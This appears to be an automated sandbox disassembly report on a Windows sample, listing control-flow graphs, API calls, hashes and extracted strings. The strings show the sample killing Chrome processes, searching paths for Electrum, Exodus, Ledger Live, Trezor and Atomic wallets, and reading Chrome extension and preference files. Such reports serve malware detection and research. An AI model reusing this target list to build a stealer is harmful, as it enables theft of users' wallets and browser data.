CloseHandle 5752->5757 5758 7ff7abc3e69c 5753->5758 5759 7ff7abc3e656-7ff7abc3e670 GetFileInformationByHandleEx 5753->5759 5763 7ff7abc3e761-7ff7abc3e766 call 7ff7abc51774 5755->5763 5764 7ff7abc3e6e3 5755->5764 5757->5714 5757->5741 5768 7ff7abc3e6a0 5758->5768 5766 7ff7abc3e672-7ff7abc3e67e GetLastError 5759->5766 5767 7ff7abc3e693-7ff7abc3e69a 5759->5767 5760->5712 5761->5741 5761->5760 5762->5763 5763->5756 5764->5749 5766->5749 5772 7ff7abc3e680-7ff7abc3e68b CloseHandle 5766->5772 5767->5768 5768->5736 5772->5762 5775 7ff7abc3e691 5772->5775 5775->5749
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2398595512-0
                                                                                                                                                                          • Opcode ID: 6858acbf963c982cb1cd254155e3c2789ca4be43a97c9a17c07e5e84bf3bcdfe
                                                                                                                                                                          • Instruction ID: d5195372c85be7408e2637ab8eca88f653481a14f1f20ce674cf8786c436105a
                                                                                                                                                                          • Opcode Fuzzy Hash: 6858acbf963c982cb1cd254155e3c2789ca4be43a97c9a17c07e5e84bf3bcdfe
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B919831B0AA0346EA786B2DA414A79E290AF857B0FD54734D97E476F4DF3CE4498730

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 5776 7ff7abc05d60-7ff7abc05daf CreateToolhelp32Snapshot 5777 7ff7abc05db1-7ff7abc05de5 call 7ff7abc244a0 5776->5777 5778 7ff7abc05e20-7ff7abc05e3a Process32FirstW 5776->5778 5785 7ff7abc05e19-7ff7abc05e1b 5777->5785 5786 7ff7abc05de7-7ff7abc05df9 5777->5786 5780 7ff7abc05fe4-7ff7abc06009 CloseHandle call 7ff7abc039d0 5778->5780 5781 7ff7abc05e40-7ff7abc05e58 5778->5781 5792 7ff7abc06014 5780->5792 5793 7ff7abc0600b-7ff7abc06012 5780->5793 5784 7ff7abc05e60-7ff7abc05e7d 5781->5784 5788 7ff7abc05e80-7ff7abc05e88 5784->5788 5791 7ff7abc0610a-7ff7abc06139 call 7ff7abc42770 5785->5791 5789 7ff7abc05e14 call 7ff7abc42790 5786->5789 5790 7ff7abc05dfb-7ff7abc05e0e 5786->5790 5788->5788 5794 7ff7abc05e8a-7ff7abc05eb5 call 7ff7abc24160 5788->5794 5789->5785 5790->5789 5797 7ff7abc06180-7ff7abc06185 call 7ff7abc4cd30 5790->5797 5799 7ff7abc0601e-7ff7abc06030 call 7ff7abc039d0 5792->5799 5793->5799 5805 7ff7abc05edb 5794->5805 5806 7ff7abc05eb7-7ff7abc05ebf 5794->5806 5808 7ff7abc06032-7ff7abc06046 5799->5808 5809 7ff7abc0609f-7ff7abc060b9 5799->5809 5811 7ff7abc05edd-7ff7abc05ee1 5805->5811 5810 7ff7abc05ec2-7ff7abc05eca 5806->5810 5812 7ff7abc06050-7ff7abc06059 5808->5812 5816 7ff7abc060bb-7ff7abc060d6 call 7ff7abc244a0 5809->5816 5817 7ff7abc0613a-7ff7abc06155 call 7ff7abc244a0 5809->5817 5810->5805 5813 7ff7abc05ecc-7ff7abc05ed3 5810->5813 5814 7ff7abc05ee3-7ff7abc05ef5 5811->5814 5815 7ff7abc05f18-7ff7abc05f1a 5811->5815 5818 7ff7abc06062-7ff7abc06080 5812->5818 5819 7ff7abc0605b-7ff7abc06060 5812->5819 5813->5810 5820 7ff7abc05ed5-7ff7abc05ed9 5813->5820 5822 7ff7abc05f10-7ff7abc05f13 call 7ff7abc42790 5814->5822 5823 7ff7abc05ef7-7ff7abc05f0a 5814->5823 5825 7ff7abc05f20-7ff7abc05f36 OpenProcess 5815->5825 5826 7ff7abc05fce-7ff7abc05fde Process32NextW 5815->5826 5834 7ff7abc06106 5816->5834 5836 7ff7abc060d8-7ff7abc060ea 5816->5836 5817->5834 5835 7ff7abc06157-7ff7abc06169 5817->5835 5827 7ff7abc06084-7ff7abc06090 Sleep call 7ff7abc039d0 5818->5827 5828 7ff7abc06082 5818->5828 5819->5827 5820->5811 5822->5815 5823->5797 5823->5822 5825->5826 5832 7ff7abc05f3c-7ff7abc05f5c 5825->5832 5826->5780 5826->5784 5839 7ff7abc06095-7ff7abc0609d 5827->5839 5828->5827 5837 7ff7abc05f60-7ff7abc05f67 5832->5837 5834->5791 5840 7ff7abc06101 call 7ff7abc42790 5835->5840 5841 7ff7abc0616b-7ff7abc0617e 5835->5841 5836->5840 5842 7ff7abc060ec-7ff7abc060ff 5836->5842 5837->5837 5838 7ff7abc05f69-7ff7abc05f7c call 7ff7abc244a0 5837->5838 5846 7ff7abc05fb0-7ff7abc05fc8 TerminateProcess CloseHandle 5838->5846 5847 7ff7abc05f7e-7ff7abc05f90 5838->5847 5839->5809 5839->5812 5840->5834 5841->5797 5841->5840 5842->5797 5842->5840 5846->5826 5848 7ff7abc05f92-7ff7abc05fa5 5847->5848 5849 7ff7abc05fab call 7ff7abc42790 5847->5849 5848->5797 5848->5849 5849->5846
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: All Chrome instances closed.$Failed to create process snapshot.$No Chrome instances found or failed to close.$Terminating Chrome process with PID $chrome.exe
                                                                                                                                                                          • API String ID: 2017165370-1079413332
                                                                                                                                                                          • Opcode ID: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
                                                                                                                                                                          • Instruction ID: 1f9d8f7adf673c947a6eec24fab4b793d6dbc30bf56e64b12940725608ca467d
                                                                                                                                                                          • Opcode Fuzzy Hash: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 75B1F971B1A64182EE10EB29E44467AA3A1FF857F4F914331EAAD077F9DE3CE5818710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskEnumUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                          • API String ID: 2880872648-867269125
                                                                                                                                                                          • Opcode ID: 40e1d524d0cf9ac0a26d818b4100a920cecaccf8db0e889dc0ecb2a8ab87186c
                                                                                                                                                                          • Instruction ID: 43a9c714de37f8f4c16c2bab5c9d1bb0ebe3305d0388b3260bbe4fccc52ecfd3
                                                                                                                                                                          • Opcode Fuzzy Hash: 40e1d524d0cf9ac0a26d818b4100a920cecaccf8db0e889dc0ecb2a8ab87186c
                                                                                                                                                                          • Instruction Fuzzy Hash: 32A1B232915BC685E720DF34DC50BE97360FB99348FA19326EA8C26935EF78A2D4C740

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 6958 7ff7abc5d2c8-7ff7abc5d303 call 7ff7abc5c9c0 call 7ff7abc5c9c8 call 7ff7abc5ca30 6965 7ff7abc5d52d-7ff7abc5d579 call 7ff7abc4cd60 call 7ff7abc5c9c0 call 7ff7abc5c9c8 call 7ff7abc5ca30 6958->6965 6966 7ff7abc5d309-7ff7abc5d314 call 7ff7abc5c9d0 6958->6966 6992 7ff7abc5d6b7-7ff7abc5d725 call 7ff7abc4cd60 call 7ff7abc6695c 6965->6992 6993 7ff7abc5d57f-7ff7abc5d58a call 7ff7abc5c9d0 6965->6993 6966->6965 6971 7ff7abc5d31a-7ff7abc5d324 6966->6971 6974 7ff7abc5d346-7ff7abc5d34a 6971->6974 6975 7ff7abc5d326-7ff7abc5d329 6971->6975 6976 7ff7abc5d34d-7ff7abc5d355 6974->6976 6978 7ff7abc5d32c-7ff7abc5d337 6975->6978 6976->6976 6979 7ff7abc5d357-7ff7abc5d36a call 7ff7abc5a168 6976->6979 6981 7ff7abc5d339-7ff7abc5d340 6978->6981 6982 7ff7abc5d342-7ff7abc5d344 6978->6982 6988 7ff7abc5d36c-7ff7abc5d36e call 7ff7abc58340 6979->6988 6989 7ff7abc5d382-7ff7abc5d38e call 7ff7abc58340 6979->6989 6981->6978 6981->6982 6982->6974 6985 7ff7abc5d373-7ff7abc5d381 6982->6985 6988->6985 6999 7ff7abc5d395-7ff7abc5d39d 6989->6999 7010 7ff7abc5d727-7ff7abc5d72e 6992->7010 7011 7ff7abc5d733-7ff7abc5d736 6992->7011 6993->6992 7001 7ff7abc5d590-7ff7abc5d59b call 7ff7abc5ca00 6993->7001 6999->6999 7002 7ff7abc5d39f-7ff7abc5d3b0 call 7ff7abc5fd10 6999->7002 7001->6992 7012 7ff7abc5d5a1-7ff7abc5d5c4 call 7ff7abc58340 GetTimeZoneInformation 7001->7012 7002->6965 7013 7ff7abc5d3b6-7ff7abc5d40c call 7ff7abc699f0 * 4 call 7ff7abc5d1e4 7002->7013 7014 7ff7abc5d7c3-7ff7abc5d7c6 7010->7014 7015 7ff7abc5d76d-7ff7abc5d780 call 7ff7abc5a168 7011->7015 7016 7ff7abc5d738 7011->7016 7029 7ff7abc5d68c-7ff7abc5d6b6 call 7ff7abc5c9b8 call 7ff7abc5c9a8 call 7ff7abc5c9b0 7012->7029 7030 7ff7abc5d5ca-7ff7abc5d5eb 7012->7030 7070 7ff7abc5d40e-7ff7abc5d412 7013->7070 7021 7ff7abc5d7cc-7ff7abc5d7d4 call 7ff7abc5d2c8 7014->7021 7022 7ff7abc5d73b 7014->7022 7036 7ff7abc5d78b-7ff7abc5d7a6 call 7ff7abc6695c 7015->7036 7037 7ff7abc5d782 7015->7037 7016->7022 7027 7ff7abc5d740-7ff7abc5d76c call 7ff7abc58340 call 7ff7abc42770 7021->7027 7022->7027 7028 7ff7abc5d73b call 7ff7abc5d544 7022->7028 7028->7027 7031 7ff7abc5d5ed-7ff7abc5d5f3 7030->7031 7032 7ff7abc5d5f6-7ff7abc5d5fd 7030->7032 7031->7032 7039 7ff7abc5d5ff-7ff7abc5d607 7032->7039 7040 7ff7abc5d611 7032->7040 7058 7ff7abc5d7ad-7ff7abc5d7bf call 7ff7abc58340 7036->7058 7059 7ff7abc5d7a8-7ff7abc5d7ab 7036->7059 7044 7ff7abc5d784-7ff7abc5d789 call 7ff7abc58340 7037->7044 7039->7040 7046 7ff7abc5d609-7ff7abc5d60f 7039->7046 7049 7ff7abc5d613-7ff7abc5d687 call 7ff7abc699f0 * 4 call 7ff7abc51824 call 7ff7abc5d7dc * 2 7040->7049 7044->7016 7046->7049 7049->7029 7058->7014 7059->7044 7072 7ff7abc5d418-7ff7abc5d41c 7070->7072 7073 7ff7abc5d414 7070->7073 7072->7070 7075 7ff7abc5d41e-7ff7abc5d443 call 7ff7abc66718 7072->7075 7073->7072 7081 7ff7abc5d446-7ff7abc5d44a 7075->7081 7083 7ff7abc5d44c-7ff7abc5d457 7081->7083 7084 7ff7abc5d459-7ff7abc5d45d 7081->7084 7083->7084 7086 7ff7abc5d45f-7ff7abc5d463 7083->7086 7084->7081 7089 7ff7abc5d4e4-7ff7abc5d4e8 7086->7089 7090 7ff7abc5d465-7ff7abc5d48d call 7ff7abc66718 7086->7090 7091 7ff7abc5d4ea-7ff7abc5d4ec 7089->7091 7092 7ff7abc5d4ef-7ff7abc5d4fc 7089->7092 7098 7ff7abc5d4ab-7ff7abc5d4af 7090->7098 7099 7ff7abc5d48f 7090->7099 7091->7092 7094 7ff7abc5d4fe-7ff7abc5d514 call 7ff7abc5d1e4 7092->7094 7095 7ff7abc5d517-7ff7abc5d526 call 7ff7abc5c9b8 call 7ff7abc5c9a8 7092->7095 7094->7095 7095->6965 7098->7089 7104 7ff7abc5d4b1-7ff7abc5d4cf call 7ff7abc66718 7098->7104 7102 7ff7abc5d492-7ff7abc5d499 7099->7102 7102->7098 7105 7ff7abc5d49b-7ff7abc5d4a9 7102->7105 7110 7ff7abc5d4db-7ff7abc5d4e2 7104->7110 7105->7098 7105->7102 7110->7089 7111 7ff7abc5d4d1-7ff7abc5d4d5 7110->7111 7111->7089 7112 7ff7abc5d4d7 7111->7112 7112->7110
                                                                                                                                                                          APIs
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D30D
                                                                                                                                                                            • Part of subcall function 00007FF7ABC5C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5C9E4
                                                                                                                                                                            • Part of subcall function 00007FF7ABC58340: RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
                                                                                                                                                                            • Part of subcall function 00007FF7ABC58340: GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360
                                                                                                                                                                            • Part of subcall function 00007FF7ABC4CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD69
                                                                                                                                                                            • Part of subcall function 00007FF7ABC4CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD8E
                                                                                                                                                                            • Part of subcall function 00007FF7ABC6695C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC668A7
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D2FC
                                                                                                                                                                            • Part of subcall function 00007FF7ABC5CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5CA44
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D572
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D583
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D594
                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ABC5D7D4), ref: 00007FF7ABC5D5BB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                                          • Opcode ID: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
                                                                                                                                                                          • Instruction ID: 017e0f9597edf185fe46cfbb7183af39125f26042c460b4c8f2bdef57bcb550f
                                                                                                                                                                          • Opcode Fuzzy Hash: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
                                                                                                                                                                          • Instruction Fuzzy Hash: DBD1D322A0A34246E720BF29D890EB9E761FF84794FC24235EA5D476B5EF3CE451C760

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 7147 7ff7abc5e170-7ff7abc5e1e3 call 7ff7abc5dd54 7150 7ff7abc5e1fd-7ff7abc5e207 call 7ff7abc5c6e4 7147->7150 7151 7ff7abc5e1e5-7ff7abc5e1ee call 7ff7abc51654 7147->7151 7156 7ff7abc5e209-7ff7abc5e220 call 7ff7abc51654 call 7ff7abc51674 7150->7156 7157 7ff7abc5e222-7ff7abc5e28b CreateFileW 7150->7157 7158 7ff7abc5e1f1-7ff7abc5e1f8 call 7ff7abc51674 7151->7158 7156->7158 7161 7ff7abc5e28d-7ff7abc5e293 7157->7161 7162 7ff7abc5e308-7ff7abc5e313 GetFileType 7157->7162 7169 7ff7abc5e53e-7ff7abc5e55e 7158->7169 7167 7ff7abc5e2d5-7ff7abc5e303 GetLastError call 7ff7abc515e8 7161->7167 7168 7ff7abc5e295-7ff7abc5e299 7161->7168 7164 7ff7abc5e366-7ff7abc5e36d 7162->7164 7165 7ff7abc5e315-7ff7abc5e350 GetLastError call 7ff7abc515e8 CloseHandle 7162->7165 7172 7ff7abc5e375-7ff7abc5e378 7164->7172 7173 7ff7abc5e36f-7ff7abc5e373 7164->7173 7165->7158 7181 7ff7abc5e356-7ff7abc5e361 call 7ff7abc51674 7165->7181 7167->7158 7168->7167 7174 7ff7abc5e29b-7ff7abc5e2d3 CreateFileW 7168->7174 7179 7ff7abc5e37e-7ff7abc5e3d3 call 7ff7abc5c5fc 7172->7179 7180 7ff7abc5e37a 7172->7180 7173->7179 7174->7162 7174->7167 7186 7ff7abc5e3d5-7ff7abc5e3e1 call 7ff7abc5df5c 7179->7186 7187 7ff7abc5e3f2-7ff7abc5e423 call 7ff7abc5dad4 7179->7187 7180->7179 7181->7158 7186->7187 7192 7ff7abc5e3e3 7186->7192 7193 7ff7abc5e429-7ff7abc5e46b 7187->7193 7194 7ff7abc5e425-7ff7abc5e427 7187->7194 7195 7ff7abc5e3e5-7ff7abc5e3ed call 7ff7abc584b8 7192->7195 7196 7ff7abc5e48d-7ff7abc5e498 7193->7196 7197 7ff7abc5e46d-7ff7abc5e471 7193->7197 7194->7195 7195->7169 7200 7ff7abc5e53c 7196->7200 7201 7ff7abc5e49e-7ff7abc5e4a2 7196->7201 7197->7196 7199 7ff7abc5e473-7ff7abc5e488 7197->7199 7199->7196 7200->7169 7201->7200 7203 7ff7abc5e4a8-7ff7abc5e4ed CloseHandle CreateFileW 7201->7203 7204 7ff7abc5e4ef-7ff7abc5e51d GetLastError call 7ff7abc515e8 call 7ff7abc5c824 7203->7204 7205 7ff7abc5e522-7ff7abc5e537 7203->7205 7204->7205 7205->7200
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                          • Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                          • Instruction ID: 075cd666fe1483c7c9345c29fbda3375c168cc698743f065058b8390a8a74103
                                                                                                                                                                          • Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DC1B132B29A4286EB10DFA8C490ABC7761F749B98F821335DA1E973B5CF38E455C710
                                                                                                                                                                          APIs
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D572
                                                                                                                                                                            • Part of subcall function 00007FF7ABC5CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5CA44
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D583
                                                                                                                                                                            • Part of subcall function 00007FF7ABC5C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5C9E4
                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7ABC5D594
                                                                                                                                                                            • Part of subcall function 00007FF7ABC5CA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5CA14
                                                                                                                                                                            • Part of subcall function 00007FF7ABC58340: RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
                                                                                                                                                                            • Part of subcall function 00007FF7ABC58340: GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360
                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ABC5D7D4), ref: 00007FF7ABC5D5BB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                          • Opcode ID: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
                                                                                                                                                                          • Instruction ID: 523952505cbb518bf5bccdd1ed2087d854e25f315c7e45a82b8a6588f43877e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D519232A1A74246F710FF69D890DB9E760BB88784F825235EA5D436B5DF3CE4508760
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
                                                                                                                                                                          • String ID: 1$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                          • API String ID: 1745604696-621175605
                                                                                                                                                                          • Opcode ID: dd98db87b711232d25a555fb221cb94b33c07972d3ba08ca9b8986b961203a82
                                                                                                                                                                          • Instruction ID: 5124024807cf3544381d9b72ec4e54b899fffc8fcdccf3e1dfeb2e8150cb4c33
                                                                                                                                                                          • Opcode Fuzzy Hash: dd98db87b711232d25a555fb221cb94b33c07972d3ba08ca9b8986b961203a82
                                                                                                                                                                          • Instruction Fuzzy Hash: D5D19662E1A7C241EA20AB18E444B7EE361FB85B94F915631EAAD036F5DF7CE580C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                          • String ID: File parse failed$\Extensions$\Preferences$\Secure Preferences$developer_mode$extensions$name$pinned_extensions$profile
                                                                                                                                                                          • API String ID: 2697701713-219585183
